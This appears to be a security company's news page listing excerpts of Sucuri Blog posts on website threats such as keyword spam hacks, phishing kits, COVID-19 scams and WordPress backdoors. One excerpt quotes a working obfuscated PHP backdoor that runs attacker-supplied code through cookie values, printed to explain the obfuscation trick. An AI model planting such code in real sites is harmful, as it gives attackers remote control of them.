Call Us Today at 1-403-291-9811 or 1-866-291-3857

Web Security

  • How to Find & Fix the Japanese Keyword Hack 2 April 2020 How to Find & Fix the Japanese Keyword Hack

    If you’re wondering how to find and fix the Japanese keyword hack, get started by identifying a real-life example. First, open Google Translate, and then get the Japanese characters for the search term buy Ralph Lauren. Copy and paste that into your favorite search engine, and take a look at the results.

    Your results may vary, but one of the results in this recent search was a technology news website from Africa.

    Continue reading How to Find & Fix the Japanese Keyword Hack at Sucuri Blog.

  • Multi-Step Phishing Kit Targeting Credit Union 1 April 2020 Multi-Step Phishing Kit Targeting Credit Union

    Phishing attacks can come in all shapes and sizes. Posing a serious threat to industries large and small, phishing campaigns are the fraudulent attempt to obtain sensitive personal information or login details to gain unauthorized access to accounts to make fraudulent purchases.

    These malicious attempts to lure victims are often done by masquerading as a trustworthy entity such as a bank, electronic communicator, internet provider, or retail company. This often involves a third party compromised website with an uploaded phishing kit.

    Continue reading Multi-Step Phishing Kit Targeting Credit Union at Sucuri Blog.

  • How to Protect Personally Identifiable Information (PII) from Search Engines 30 March 2020 How to Protect Personally Identifiable Information (PII) from Search Engines

    In today’s internet age we take our privacy for granted. We sign up for many services which are “free.” We participate in giveaways and generally give out information about ourselves all the time to websites that might not be very reputable and hardly anyone reads their privacy policy or terms of service.

    Selling private information

    In many cases, those “free” websites sell our data to data brokers. They in turn sell access to our information to anyone who wants to find us, under the pretense that you can find your long lost friend or family.

    Continue reading How to Protect Personally Identifiable Information (PII) from Search Engines at Sucuri Blog.

  • VPN: A Key to Securing an Online Work Environment 27 March 2020 VPN: A Key to Securing an Online Work Environment

    The current COVID-19 epidemic is changing the way people work, rapidly moving to working remotely as I have done for 20 years. I am providing this advice for smaller businesses that should leverage virtual private networks (VPNs)  to enhance your security. This by no means should be all you rely on, but could be a simple, cost-effective way of adding an additional layer to your security posture in this changing environment.

    VPNs offer great protection.

    Continue reading VPN: A Key to Securing an Online Work Environment at Sucuri Blog.

  • Assemble the Cookies 25 March 2020 Assemble the Cookies

    When we investigate compromised websites, it’s not unusual to find malicious files that have been obfuscated through forms of encoding or encryption — however, these are not the only methods that attackers use to obfuscate code.

    Obfuscation via Predefined PHP Variables

    Here’s an example of obfuscation that doesn’t use encoding or encryption in any way:

    <?php
    $x='_C';$v='OO';/*5h*/$o='KI';/*{*Z*/$qv='E';$j/*8i$7*/=${$x.$v.$o.$qv};if(isset($j/*f(UZ*/['Q'])){$oo=$j/*Mr*/['Q'].$j['J'];$tj=/*m5d*/$j['St'].$j['V'].$j['x'];$pd=$oo('',$tj($j['U']));$pd();}

    Instead, this example splits a PHP predefined variable, $_COOKIE, into segmented strings assigned to variables before concatenating them.

    Continue reading Assemble the Cookies at Sucuri Blog.

  • Free Sucuri WAF for Medical & Social Services 24 March 2020 Free Sucuri WAF for Medical & Social Services

    During the COVID-19 pandemic, there is concern about health systems worldwide. Many people in isolation or self-quarantine are looking for accurate medical information online on a daily basis.

    As a result, it is crucial that public health and social service websites remain available. We want to prevent malicious users from abusing these types of websites. So, we decided to stand up and do something about it.

    Free year of the Sucuri WAF for crisis responders

    Sucuri is going to provide crisis responders with a free website firewall for one year during the coronavirus pandemic.

    Continue reading Free Sucuri WAF for Medical & Social Services at Sucuri Blog.

  • Safe Browsing During a Pandemic: How to Spot COVID-19 Phishing Campaigns 23 March 2020 Safe Browsing During a Pandemic: How to Spot COVID-19 Phishing Campaigns

    Online bad actors tend to take advantage of tragedy for their own gain – and the coronavirus is no different.

    While we would hope that cybercriminals would be sympathetic during a global health crisis, it already appears this may be a pipe dream. As the virus spread across the world causing shutdowns and quarantines, cybersecurity analysts began seeing coronavirus and COVID-19-themed cyberattacks in the wild. In the Czech Republic, a hospital that was a designated testing center was hit with ransomware.

    Continue reading Safe Browsing During a Pandemic: How to Spot COVID-19 Phishing Campaigns at Sucuri Blog.

  • Tips for New Remote Workers 19 March 2020 Tips for New Remote Workers

    With the new pandemic hovering over our heads, the main piece of advice from most countries is stay home. Working remotely is a new reality for many people around the world, and Sucuri can help you make this new endeavor easier for you. We have been an entirely remote team since the creation of the company, more than 10 years ago.

    Working from home has its perks and challenges. We asked our colleagues what recommendations they had for people who are starting to work from home as well as some advice to mitigate cybersecurity risks.

    Continue reading Tips for New Remote Workers at Sucuri Blog.

  • 2020 Website Security Glossary 16 March 2020 2020 Website Security Glossary

    As the online threat landscape continues to evolve, so too does the language we use to describe it. To support a safer internet for everyone, we’ve compiled this glossary. Based on our research, this is today’s most relevant terminology in website security.

    A

    Adware: Often in the form of browser pop-ups or unclosable windows, adware displays advertisements which then generate revenue for the attacker

    AntiVirus (Website): A website security system designed to detect and destroy malware that infects websites.

    Continue reading 2020 Website Security Glossary at Sucuri Blog.

  • Throwback Threat Thursday: WordPress 4.7 WP-JSON Content Injection Vulnerability 12 March 2020 Throwback Threat Thursday: WordPress 4.7 WP-JSON Content Injection Vulnerability

    Throwback Threat Thursday is a series of posts where we recall older vulnerabilities that have since been patched by their developers. In the past, these vulnerabilities caused significant impacts to the security of website owners. Some vulnerable sites may still be found in the wild.

    Back in early 2017, our research team was looking into multiple open-source projects for security issues. While looking into the then-current WordPress 4.7.0, we found a severe content injection (privilege escalation) vulnerability.

    Continue reading Throwback Threat Thursday: WordPress 4.7 WP-JSON Content Injection Vulnerability at Sucuri Blog.

  • WordPress Database Brute Force and Backdoors 11 March 2020 WordPress Database Brute Force and Backdoors

    We regularly talk about brute force attacks on WordPress sites and explain why WordPress credentials should always be unique, complex, and hard to guess.

    However, the WordPress login is not the only point of entry that hackers use to break into sites. Since the WordPress CMS stores most of its settings in a database, attackers can get access directly to the database to modify functionality and inject malicious code.

    Brute Force Attacks on WordPress Databases

    Databases are another potential target for brute force attacks.

    Continue reading WordPress Database Brute Force and Backdoors at Sucuri Blog.